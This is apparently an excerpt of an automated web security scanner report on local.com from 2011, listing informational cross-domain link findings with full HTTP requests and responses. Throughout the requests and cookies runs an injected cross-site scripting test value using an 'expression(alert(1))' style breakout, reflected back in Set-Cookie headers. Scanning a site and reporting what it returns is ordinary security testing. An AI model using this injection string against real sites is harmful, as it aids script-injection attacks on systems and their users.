                   <img src="http://cr0.worthathousandwords.com/1/A4/9D/C48BBF4788DACF520AC4AA0DA3D.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDbqhh%7Bxzzfiw%7Ciywnih%7Chhmqgv7yzenxhlxvs%7E4fxq-uyr%40Jpifwz*%7C%24%60bhz%23%5Ciywnih%7C*kfxCQxv%7Bi%25Gpnvpdft%23%5Bizuf%7Bujr%7Bt" alt="" />
               </a>
...[SNIP]...
<div class="mT15" style="clear:both">
<iframe width="500" height="195" frameBorder="no" scrolling="no" src="http://us.yhs.search.yahoo.com/if?p=restaurants&partnerid=yhs-if-local1&fr=yhs-if-local1&ei=UTF-8" id="yhs-if"></iframe>
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
<div class="facebook">
                   <a href="http://www.facebook.com/local.com/" target="_blank" alt="Recommend Local.com on Facebook" title="Recommend Local.com on Facebook" class="fBookButton" omn_key="BS1SEO:101:1:1014" onclick="return loc_click(this);">
                   </a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="ic-hulk2010production.122.2O7.net/b/ss/ic-hulk2010production/1/H.17--NS/0?pageName=Businesses+-+SERP+-+SEO" height="1" width="1" border="0" alt="" />
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=restaurants"></script>
...[SNIP]...

8.3. http://www.local.com/business/v3/js/globalbusiness_3_5.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/v3/js/globalbusiness_3_5.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /business/v3/js/globalbusiness_3_5.js?v=4034_19829 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "146be5643bfa9aaba91d3e4326dd137"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=26246
Expires: Thu, 03 Feb 2011 23:17:16 GMT
Date: Thu, 03 Feb 2011 15:59:50 GMT
Connection: close
Content-Length: 477751


ic0n=function(parentObj){var _components=[];var _objid=new Date()*1;var root={OnDom:function(func){this.AddListener(window,"load",func);},OnLoad:function(func){this.AddListener(window,"load",func);},
...[SNIP]...
<div id='centerButton'><img id='centerIcon' src='http://maps.ucla.edu/campus/help/images/i_zoomin.png' width='16' height='16'/></div>
...[SNIP]...

8.4. http://www.local.com/coupons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /coupons/?location=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103070
Date: Thu, 03 Feb 2011 16:44:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...
</script>

<script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3c"></script>
...[SNIP]...
</div>
                <a omn_key="CL:100:1:1011" onclick="return loc_click(this);" href="http://weather.weatherbug.com/?zip=75201&zcode=6292" target="_blank">
                <img src="/skins/default/images/wBugLogo.jpg" alt="WeatherBug" class="mT5" />
...[SNIP]...
<p class="fr txtUP bold txt11" style="margin:5px 25px 0 0">Provided by: <a href="http://www.thedealmap.com/" target="_blank" rel="nofollow">The Dealmap</a>
...[SNIP]...
<a omn_key="CL:125:1:1104" onclick="return loc_click(this);" href="/coupons/online/?keyword=Old Navy&location=Dallas, TX">
<img src="http://cdn.savings.com/logo/2309.gif" />
</a>
...[SNIP]...
<div class="storeImg"><img src="http://cdn.savings.com/logo/2309.gif" /></div>
...[SNIP]...
<div><a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D169578" class="blueLink" target="_blank">Visit store site</a>
...[SNIP]...
<br />

<a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D183568" rel="nofollow" target="_blank"><div class="getDeal" style="position:absolute;bottom:30px;">
...[SNIP]...
<p class="txt11 bold txtUP mB10 mT5" style="position:absolute;bottom:0px">Provided by: <a href="http://www.savings.com/" target="_blank" rel="nofollow">Savings.com</a>
...[SNIP]...
<a omn_key="CL:125:1:1104" onclick="return loc_click(this);" href="/coupons/online/?keyword=Apple&location=Dallas, TX">
<img src="http://cdn.savings.com/logo/1608646.png" />
</a>
...[SNIP]...
<div class="storeImg"><img src="http://cdn.savings.com/logo/1608646.png" /></div>
...[SNIP]...
<div><a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D170735" class="blueLink" target="_blank">Visit store site</a>
...[SNIP]...
<br />

<a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D126517" rel="nofollow" target="_blank"><div class="getDeal" style="position:absolute;bottom:30px;">
...[SNIP]...
<p class="txt11 bold txtUP mB10 mT5" style="position:absolute;bottom:0px">Provided by: <a href="http://www.savings.com/" target="_blank" rel="nofollow">Savings.com</a>
...[SNIP]...
<a omn_key="CL:125:1:1104" onclick="return loc_click(this);" href="/coupons/online/?keyword=Drugstore.com&location=Dallas, TX">
<img src="http://cdn.savings.com/logo/637068.jpeg" />
</a>
...[SNIP]...
<div class="storeImg"><img src="http://cdn.savings.com/logo/637068.jpeg" /></div>
...[SNIP]...
<div><a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D169494" class="blueLink" target="_blank">Visit store site</a>
...[SNIP]...
<br />

<a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D193426" rel="nofollow" target="_blank"><div class="getDeal" style="position:absolute;bottom:30px;">
...[SNIP]...
<p class="txt11 bold txtUP mB10 mT5" style="position:absolute;bottom:0px">Provided by: <a href="http://www.savings.com/" target="_blank" rel="nofollow">Savings.com</a>
...[SNIP]...
<p class="fr txt11 bold txtUP mB10">Provided by: <a href="http://www.savings.com/" target="_blank" rel="nofollow">Savings.com</a>
...[SNIP]...
<p class="fr txt11 bold txtUP mB10 mT5 ie6hide">Provided by: <a href="http://www.thedealmap.com/" target="_blank" rel="nofollow">The Dealmap</a>
...[SNIP]...
<a href="/coupons/grocery/16040055/" omn_key="CL:127:1:2004" onclick="return loc_click(this);">
    <img src="http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/055/16040055.gif" alt="$0.55 off on VLASIC Pickles, Peppers or Relish" />
    </a>
...[SNIP]...
<a href="/coupons/grocery/16078167/" omn_key="CL:127:1:2004" onclick="return loc_click(this);">
    <img src="http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/167/16078167.gif" alt="$0.75 off JELL-O Pudding or Mousse Snacks 6-packs" />
    </a>
...[SNIP]...
<a href="/coupons/grocery/16015184/" omn_key="CL:127:1:2004" onclick="return loc_click(this);">
    <img src="http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/184/16015184.gif" alt="$1.00 off 2 JELL-O Gelatin, Pudding or Mousse 6pks" />
    </a>
...[SNIP]...
<a href="/coupons/weekly/aarons-inc/dallas-tx/2615225/aaronsinc-010111/?retailer=Aaron's+Inc" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/aaronsinc/large/010111_1_SU0C9ZX_pjbi5.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/ace-hardware/dallas-tx/2434390/ace-110201ss/?retailer=ACE+Hardware" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/acehardware/large/110201SS_001_C001P1_FkAdg.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/albertsons/dallas-tx/2408168/alb-llc-110202-dw/?retailer=Albertson's" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/albertsons/large/110202_DW_1_v1_GUAdw.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/toys-r-us/dallas-tx/2598804/babiesrus-110128/?retailer=Toys+R+Us" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/toysrus/large/110128_BRU_1_V1_RELEASE_eci8j.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/best-buy/dallas-tx/2490843/020111movie/?retailer=Best+Buy" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/bestbuy/large/020111Movie_1_3h9pr.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/compusa/dallas-tx/2622575/compusa-110130/?retailer=CompUSA" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/compusa/large/110130_CompUSA_MH_SS_Frontcvr_z373z.jpg" alt="" />
</a>
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
<div class="facebook">
                   <a href="http://www.facebook.com/local.com/" target="_blank" alt="Recommend Local.com on Facebook" title="Recommend Local.com on Facebook" class="fBookButton" omn_key="CL:101:1:1014" onclick="return loc_click(this);">
                   </a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="ic-hulk2010production.122.2O7.net/b/ss/ic-hulk2010production/1/H.17--NS/0?pageName=Coupons+-+Landing" height="1" width="1" border="0" alt="" />
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw="></script>
...[SNIP]...

8.5. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Date: Thu, 03 Feb 2011 16:01:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748882748?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748882748?" border="0" alt="" /></a>
...[SNIP]...

8.6. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&pos=3&t=3&sz=160x600&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 15:59:57 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748812638?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=3;tile=3;cat=financial_services;city=dallas_tx;sz=160x600;ord=1296748812638?" border="0" alt="" /></a>
...[SNIP]...

8.7. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=4&t=4&sz=728x90&ord=1296748884962&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 843
Date: Thu, 03 Feb 2011 16:01:13 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748884962?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=4;tile=4;city=dallas_tx;sz=728x90;ord=1296748884962?" border="0" alt="" /></a>
...[SNIP]...

8.8. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748830841&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f%22style%3d%22x%3aexpression(alert(1))%22fccc9411126
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.1.10.1296748820; __qca=P0-30084348-1296748820628; ASP.NET_SessionId=en03gt2mbtrg5hymvlucfg2l; localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=41e9b545-7b15-424c-972c-65baecb81534&expdate=634349085968705455&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_jsa134f%22style%253d%22x%253aexpression(alert(1))%22fccc9411126&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506&exp=634323183968705455

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:09 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.sp/retail_banks_15020100;dcopt=ist;kw=banks;pos=11;tile=11;cat=financial_services;city=dallas_tx;sz=300x250;ord=1296748830841?" border="0" alt="" /></a>
...[SNIP]...

8.9. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.pp&sz=491x223&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 834
Date: Thu, 03 Feb 2011 16:01:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
